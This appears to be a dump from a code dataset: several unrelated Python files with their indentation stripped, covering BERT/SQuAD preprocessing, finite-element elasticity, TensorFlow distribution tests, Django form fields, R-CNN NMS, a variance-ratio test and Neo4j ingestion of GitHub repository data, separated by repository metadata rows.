paragraph_text = paragraph["context"]
doc_tokens, char_to_word_offset = token_offset(paragraph_text)
for qa in paragraph["qas"]:
one_example = process_one_example(qa, is_training, version_2_with_negative,
doc_tokens, char_to_word_offset)
if one_example is not None:
examples.append(one_example)
return examples
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def convert_examples_to_features(examples, tokenizer, max_seq_length, doc_stride,
max_query_length, is_training, output_fn, vocab_file):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
output = []
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple("DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output.append(feature)
unique_id += 1
return output
| 40.160256
| 103
| 0.600878
|
1208615e7f48308c5d7649e79fa6d0e78606a5ad
| 2,427
|
py
|
Python
|
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | 1
|
2019-01-14T03:07:43.000Z
|
2019-01-14T03:07:43.000Z
|
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
from esys.escript import *
from esys.escript.linearPDEs import LinearPDE
import esys.dudley as dudley
from esys.weipa import saveVTK
press0=1.
lamb=1.
nu=0.3
# this sets the hook tensor:
def setHookTensor(w,l,n):
C=Tensor4(0.,w)
for i in range(w.getDim()):
for j in range(w.getDim()):
C[i,i,j,j]+=l
C[j,i,j,i]+=n
C[j,i,i,j]+=n
return C
# generate mesh: here 10x20 mesh of order 2
domain=dudley.Rectangle(10,20,1,l0=0.5,l1=1.0)
# get handel to nodes and elements:
e=Function(domain)
fe=FunctionOnBoundary(domain)
n=ContinuousFunction(domain)
#
# set a mask msk of type vector which is one for nodes and components set be a constraint:
#
msk=whereZero(n.getX()[0])*[1.,1.]
#
# set the normal stress components on face elements.
# faces tagged with 21 get the normal stress [0,-press0].
#
# now the pressure is set to zero for x0 coordinates bigger then 0.1
press=whereNegative(fe.getX()[0]-0.1)*200000.*[1.,0.]
# assemble the linear system:
mypde=LinearPDE(domain)
mypde.setValue(A=setHookTensor(e,lamb,nu),y=press,q=msk,r=[0,0])
mypde.setSymmetryOn()
mypde.getSolverOptions().setVerbosityOn()
mypde.getSolverOptions().setPreconditioner(mypde.getSolverOptions().AMG)
# solve for the displacements:
u_d=mypde.getSolution()
# get the gradient and calculate the stress:
g=grad(u_d)
stress=lamb*trace(g)*kronecker(domain)+nu*(g+transpose(g))
# write the hydrostatic pressure:
saveVTK("result.vtu",displacement=u_d,pressure=trace(stress)/domain.getDim())
| 32.36
| 90
| 0.691389
|
0e6f81df1f9f78d88c4e102dad94e94a29ac4e76
| 5,283
|
py
|
Python
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 28
|
2020-02-10T07:03:06.000Z
|
2022-01-12T11:19:20.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for class OneDeviceStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import strategy_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import test
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.one_device_strategy,
strategy_combinations.one_device_strategy_gpu
],
mode=["eager", "graph"]))
class OneDeviceStrategyTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.OneDeviceDistributionTestBase):
def testMinimizeLoss(self, distribution):
if context.executing_eagerly():
self._test_minimize_loss_eager(distribution)
else:
self._test_minimize_loss_graph(distribution)
def testReplicaId(self, distribution):
self._test_replica_id(distribution)
def testCallAndMergeExceptions(self, distribution):
self._test_call_and_merge_exceptions(distribution)
def testReplicateDataset(self, distribution):
if tf2.enabled() and not context.executing_eagerly():
self.skipTest("Skipping test since we do not support graph mode in TF 2")
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
self._test_input_fn_iterable(distribution, input_fn, expected_values)
def testMakeInputFnIteratorWithDataset(self, distribution):
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values)
def testMakeInputFnIteratorWithCallable(self, distribution):
def fn():
dataset = dataset_ops.Dataset.range(10)
it = dataset_ops.make_one_shot_iterator(dataset)
return it.get_next
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values,
test_reinitialize=False, ignore_order=True)
def testNumpyDataset(self, distribution):
self._test_numpy_dataset(distribution)
def testRun(self, distribution):
self._test_run(distribution)
def testAllReduceSum(self, distribution):
self._test_all_reduce_sum(distribution)
def testAllReduceSumGradients(self, distribution):
self._test_all_reduce_sum_gradients(distribution)
def testAllReduceSumGradientTape(self, distribution):
self._test_all_reduce_sum_gradient_tape(distribution)
def testAllReduceMean(self, distribution):
self._test_all_reduce_mean(distribution)
def testAllReduceMeanGradients(self, distribution):
self._test_all_reduce_mean_gradients(distribution)
def testAllReduceMeanGradientTape(self, distribution):
self._test_all_reduce_mean_gradient_tape(distribution)
def testTrainableVariables(self, distribution):
self._test_trainable_variable(distribution)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.one_device_strategy_on_worker_1,
strategy_combinations.one_device_strategy_gpu_on_worker_1
],
mode=["eager", "graph"]))
class OneDeviceStrategyOnRemoteWorkerTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.OneDeviceDistributionTestBase):
def testDeviceAndInputDeviceAreColocated(self, distribution):
self._test_device_and_input_device_are_colocated(distribution)
def testDeviceAndInputDeviceAreColocatedWithFunction(self, distribution):
self._test_device_and_input_device_are_colocated_with_function(distribution)
if __name__ == "__main__":
test.main()
| 37.735714
| 80
| 0.765474
|
360dbedb2d31808c31c0eb2d2114b6d543e4f46f
| 1,920
|
py
|
Python
|
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Australian-specific Form helpers
"""
from __future__ import absolute_import, unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import CharField, RegexField, Select
from django.utils.encoding import smart_text
from django.utils.translation import ugettext_lazy as _
from .au_states import STATE_CHOICES
PHONE_DIGITS_RE = re.compile(r'^(\d{10})$')
class AUPostCodeField(RegexField):
""" Australian post code field.
Assumed to be 4 digits.
Northern Territory 3-digit postcodes should have leading zero.
"""
default_error_messages = {
'invalid': _('Enter a 4 digit postcode.'),
}
def __init__(self, max_length=4, min_length=None, *args, **kwargs):
super(AUPostCodeField, self).__init__(r'^\d{4}$',
max_length, min_length, *args, **kwargs)
class AUPhoneNumberField(CharField):
"""
A form field that validates input as an Australian phone number.
Valid numbers have ten digits.
"""
default_error_messages = {
'invalid': 'Phone numbers must contain 10 digits.',
}
def clean(self, value):
"""
Validate a phone number. Strips parentheses, whitespace and hyphens.
"""
super(AUPhoneNumberField, self).clean(value)
if value in EMPTY_VALUES:
return ''
value = re.sub('(\(|\)|\s+|-)', '', smart_text(value))
phone_match = PHONE_DIGITS_RE.search(value)
if phone_match:
return '%s' % phone_match.group(1)
raise ValidationError(self.error_messages['invalid'])
class AUStateSelect(Select):
"""
A Select widget that uses a list of Australian states/territories as its
choices.
"""
def __init__(self, attrs=None):
super(AUStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
| 29.090909
| 86
| 0.665104
|
50611c0f84ac3e8a5c3d2e811566ef36578654e5
| 398
|
py
|
Python
|
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | 2
|
2021-03-06T11:05:43.000Z
|
2021-05-23T14:55:53.000Z
|
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | null | null | null |
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | null | null | null |
"""
Configurations for the service 'Latency'.
"""
class Default:
"""
Default configuration.
"""
DEBUG = True
LOG_LEVEL = "INFO"
APP_HOST = "localhost"
APP_PORT = 8000
class Debug(Default):
"""
Debug configuration.
"""
DEBUG = True
LOG_LEVEL = "DEBUG"
class Production(Default):
"""
Production configuration.
"""
DEBUG = False
| 12.83871
| 41
| 0.577889
|
78e852d5705c1df2d4f0ced019694cf6dc1a496b
| 1,059
|
py
|
Python
|
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
#是非极大值抑制
import numpy as np
def py_cpu_nms(dets, thresh):
"""Pure Python NMS baseline."""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
| 27.153846
| 59
| 0.459868
|
6f2cca215a10937a4bd949ee968a9936782ba77b
| 1,401
|
py
|
Python
|
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import Calculations as Ca
from pprint import pprint
# Variance ratio test for market efficiency by Lo MacKinlay (1988)
# Aleksius Kurkela
# kurkela.aleksius@gmail.com
def estimate(data, lags):
"""
:param data: Data frame of prices [p1, p2, p3 ... pt] with the label "Price" as header
:param lag: Int lag for interpreting the price array
:return: Array of tuples in the following way {Variance ratio for set lag, Heteroscedasticity, Homoscedasticity}
"""
TargetPrices = data['Price'].to_numpy(dtype=np.float64)
TestResult = []
k = 0
while k < len(lags):
vr, res1, res2 = Ca.VR(np.log(TargetPrices), int(lags[k]))
TestResult.append({
f'Homoscedasticity': res1,
f'Heteroscedasticity': res2,
f'Variance Ratio': vr,
f'k=': lags[k]
})
k += 1
return TestResult
def main():
# Create random prices
np.random.seed(13)
steps = np.random.normal(0, 1, size=100000)
steps[0] = 0
P = 10000 + np.cumsum(steps)
data = pd.DataFrame(P, columns=['Price'])
lags = []
k = int(input("Input the amount of lags wanted: "))
n = 0
while n < k:
lag = input("Set lag: ")
if lag == "/s":
break
lags.append(lag)
n += 1
result = estimate(data, lags)
pprint(result)
main()
| 25.472727
| 116
| 0.596717
|
5e8babe9b9c59e60ab90dc88932328eb9f5347ed
| 16,649
|
py
|
Python
|
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | 2
|
2019-11-18T18:01:27.000Z
|
2021-05-13T18:16:17.000Z
|
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | null | null | null |
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | 3
|
2019-07-18T19:33:04.000Z
|
2021-01-13T21:13:29.000Z
|
"""Store information in Neo4j graph database.
Use -h or --help for more information.
"""
import argparse
import csv
import logging
import os
from typing import Dict, IO, List
from util.neo4j import Neo4j, Node
from util.parse import \
parse_google_play_info, \
parse_iso8601
__log__ = logging.getLogger(__name__)
NEO4J_HOST = 'bolt://localhost'
NEO4J_PORT = 7687
GITLAB_HOST = 'http://145.108.225.21'
GITLAB_REPOSITORY_PATH = '/var/opt/gitlab/git-data/repositories/gitlab'
def add_google_play_page_node(
package_name: str, neo4j: Neo4j, play_details_dir: str) -> Node:
"""Create a node for an Google Play page.
Meta data of Google Play page is loaded from JSON file at
<play_details_dir>/<package_name>.json
:param str package_name:
Package name.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:return Node:
Node created for Google Play page if JSON file exists, otherwise None.
"""
google_play_info = parse_google_play_info(package_name, play_details_dir)
if not google_play_info:
__log__.warning('Cannot create GooglePlayPage node %s.', package_name)
return None
__log__.info('Create GooglePlayPage node for %s.', package_name)
return neo4j.create_node('GooglePlayPage', **google_play_info)
def format_repository_data(meta_data: dict, snapshot: dict) -> dict:
"""Format repository data for insertion into Neo4j.
:param dict meta_data:
Meta data of Google Play Store page parses from JSON.
:param dict snapshot:
Information about Gitlab project that hosts snapshot of the repository.
:returns dict:
A dictionary of properties of the node to create.
"""
if snapshot.get('created_at'):
timestamp = parse_iso8601(snapshot.get('created_at'))
else:
timestamp = None
return {
'id': meta_data['id'],
'owner': meta_data['owner_login'],
'name': meta_data['name'],
'snapshot': snapshot.get('web_url'),
'snapshotTimestamp': timestamp,
'description': meta_data['description'],
'createdAt': meta_data['created_at'],
'forksCount': meta_data['forks_count'],
'stargazersCount': meta_data['stargazers_count'],
'subscribersCount': meta_data['subscribers_count'],
'watchersCount': meta_data['watchers_count'],
'networkCount': meta_data['network_count'],
'ownerType': meta_data['owner_type'],
'parentId': meta_data['parent_id'],
'sourceId': meta_data['source_id']
}
def add_fork_relationships(neo4j: Neo4j):
"""Add FORK_OF relationships between existing GitHubRepository entities.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
query = '''
MATCH (fork:GitHubRepository), (parent:GitHubRepository)
WHERE fork.parentId = parent.id OR fork.sourceId = parent.id
CREATE (fork)-[:FORKS]->(parent)
'''
neo4j.run(query)
def add_repository_node(
meta_data: dict, snapshots: List[dict], neo4j: Neo4j) -> Node:
"""Add a repository and link it to all apps imnplemented by it.
Does not do anything if packages_names is empty or no :App node exists
with a matching package name.
:param dict meta_data:
Meta data of Google Play Store page parses from JSON.
:param List[Dict[str, str]] snapshots:
List of snapshots data. Must be length 1.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:returns Node:
The node created for the repository.
"""
snapshot = snapshots[0] if snapshots else {}
repo_data = format_repository_data(meta_data, snapshot)
query = '''
CREATE (repo:GitHubRepository {repo_properties})
RETURN repo
'''
result = neo4j.run(query, repo_properties=repo_data)
return result.single()[0]
def add_tag_nodes(tags: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT tags of a repository.
Creates a node for each tag and links it with the repository identified
by repo_node_id and the commit the tag points to.
:param List[Dict[str, str]] tags:
List of tag data.
:param int repo_node_id:
ID of node the tags should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for tag in tags:
parameters = {
'commit_hash': tag.get('commit_hash'),
'repo_id': repo_node_id,
'tag_details': {
'name': tag.get('tag_name'),
'message': tag.get('tag_message'),
},
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit_hash}})
CREATE
(tag:Tag {tag_details})-[:BELONGS_TO]->(repo),
(tag)-[:POINTS_TO]->(commit)
''', **parameters)
def add_branche_nodes(branches: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT branches of a repository.
Creates a node for each branch and links it with the repository identified
by repo_node_id and the commit the branch points to.
:param List[Dict[str, str]] branches:
List of information on branches.
:param int repo_node_id:
ID of node the branches should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for branch in branches:
parameters = {
'commit_hash': branch.get('commit_hash'),
'repo_id': repo_node_id,
'branch_details': {
'name': branch.get('branch_name'),
},
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit_hash}})
CREATE
(branch:Branch {branch_details})-[:BELONGS_TO]->(repo),
(branch)-[:POINTS_TO]->(commit)
''', **parameters)
def add_commit_nodes(commits: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT commits of a repository.
Creates a node for each commit and links it with the repository identified
by repo_node_id.
Also creates relationships to author, committer and parent commits. Creates
each of these in turn unless they exist already.
:param List[Dict[str, str]] commits:
List of data of commits.
:param int repo_node_id:
ID of node the commits should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for commit in commits:
parameters = {
'repo_id': repo_node_id,
'commit': {
'id': commit.get('id'),
'short_id': commit.get('short_id'),
'title': commit.get('title'),
'message': commit.get('message'),
'additions': commit.get('additions'),
'deletions': commit.get('deletions'),
'total': commit.get('total'),
},
'author': {
'email': commit.get('author_email'),
'name': commit.get('author_name'),
},
'committer': {
'email': commit.get('committer_email'),
'name': commit.get('committer_name'),
},
'authored_date': commit.get('authored_date'),
'committed_date': commit.get('committed_date'),
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit}.id})
ON CREATE SET commit = {commit}
ON MATCH SET commit += {commit}
MERGE (author:Contributor {email: {author}.email})
ON CREATE SET author = {author}
ON MATCH SET author += {author}
MERGE (committer:Contributor {email: {committer}.email})
ON CREATE SET committer = {committer}
ON MATCH SET committer += {committer}
CREATE
(commit)-[:BELONGS_TO]->(repo),
(author)-[:AUTHORS {timestamp: {authored_date}}]->(commit),
(committer)-[:COMMITS {timestamp: {committed_date}}]->(commit)
''', **parameters)
for parent in commit.get('parent_ids').split(','):
neo4j.run(
'''
MATCH (c:Commit {id: {child}})
MERGE (p:Commit {id: {parent}})
CREATE (c)-[:PARENT]->(p)
''', parent=parent, child=commit.get('id'))
__log__.debug('Created commit %s', parameters['commit']['id'])
def add_paths_property(
properties: dict, repo_node_id: int, package_name: str, neo4j: Neo4j):
"""Add path names as properties based on search.
Search a git repository and add file names which contain matches to an
:IMPLEMENTED_BY relationship matched agains package_name and repoe_node_id.
:param dict properties:
Mapping of property name to propertie values to be added to
relationship.
:param int repo_node_id:
Identifier for :GitHubRepository node which the :IMPLEMENTED_BY
relationship points to.
:param str package_name:
Package name of :App node.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
parameters = {
'package': package_name,
'repo_id': repo_node_id,
'rel_properties': properties,
}
query = '''
MATCH
(a:App {id: {package}}), (repo:GitHubRepository)
WHERE id(repo) = {repo_id}
MERGE (a)-[r:IMPLEMENTED_BY]->(repo)
ON CREATE SET r = {rel_properties}
ON MATCH SET r += {rel_properties}
'''
neo4j.run(query, **parameters)
def add_implementation_properties(
properties: List[dict], repo_node_id: int, packages: List[str],
neo4j: Neo4j):
"""Add properties to IMPLEMENTED_BY relationship.
Find Android manifest files and build system files for app in the
repository and add their paths as properties to the IMPLEMENTED_BY
relationship.
:param List[Dict[str, str]] properties:
A list of dictionaries. Each has a key 'package' and other keys that
need to be added to a relation with that package.
:param int repo_node_id:
ID of node representing the repository.
:param List[str] packages:
A list of package names to be connected with the repository identified
by repo_node_id.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
if {pp['package'] for pp in properties} != set(packages):
__log__.error(
'Packages stored with paths do not match. '
'Original: %s. Properties: %s', packages, properties)
# Create empty IMPLEMENTED_BY relations to make sure all packages are
# connected.
for package in packages:
add_paths_property({}, repo_node_id, package, neo4j)
for attr in properties:
package = attr['package']
del attr['package']
add_paths_property(attr, repo_node_id, package, neo4j)
def read_csv(prefix: str, filename: str) -> List[Dict[str, str]]:
"""List of all rows of a CSV file as dictionaries.
:param str prefix:
Directory of CSV file.
:param str filename:
Filename of CSV file.
:returns List[Dict[str, str]]:
List of rows of CSV file as dictionaries.
"""
path = os.path.join(prefix, filename)
with open(path) as csv_file:
csv_reader = csv.DictReader(csv_file)
return list(csv_reader)
def add_repository_info(
csv_file: IO[str], play_details_dir: str, neo4j: Neo4j,
repo_details_dir: str):
"""Add data of GIT repositories to Neo4j.
:param IO[str] csv_file:
CSV file containing meta data of repositories.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:param str repo_details_dir:
Path in which CSV files with repository details, such as commits,
branches, etc are stored.
"""
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
__log__.info('Create repo info: %s', (
row['id'], row['full_name'],
row['clone_project_id'], row['clone_project_path']))
packages = row['packages'].split(',')
__log__.info('Found packages: %s', packages)
add_app_data(packages, play_details_dir, neo4j)
path = os.path.join(repo_details_dir, row['id'])
snapshots = read_csv(path, 'snapshot.csv')
node = add_repository_node(row, snapshots, neo4j)
__log__.info('Created :GitHubRepository node with id %d', node.id)
add_commit_nodes(read_csv(path, 'commits.csv'), node.id, neo4j)
__log__.info('Created :Commit nodes')
add_branche_nodes(read_csv(path, 'branches.csv'), node.id, neo4j)
__log__.info('Created :Branch nodes')
add_tag_nodes(read_csv(path, 'tags.csv'), node.id, neo4j)
__log__.info('Created :Tag nodes')
add_implementation_properties(
read_csv(path, 'paths.csv'), node.id, packages, neo4j)
add_fork_relationships(neo4j)
def add_app_data(packages: List[str], play_details_dir: str, neo4j: Neo4j):
"""Create nodes and relationships for Android apps.
:param List[str] packages:
List of package names to create :App and :GooglePlayPage nodes for.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for package in packages:
__log__.info(
'Add :GooglePlayPage and :App nodes for package: %s', package)
add_google_play_page_node(package, neo4j, play_details_dir)
neo4j.run(
'''MERGE (g:GooglePlayPage {docId: {package}})
CREATE (a:App {id: {package}})-[:PUBLISHED_AT]->(g)''',
package=package)
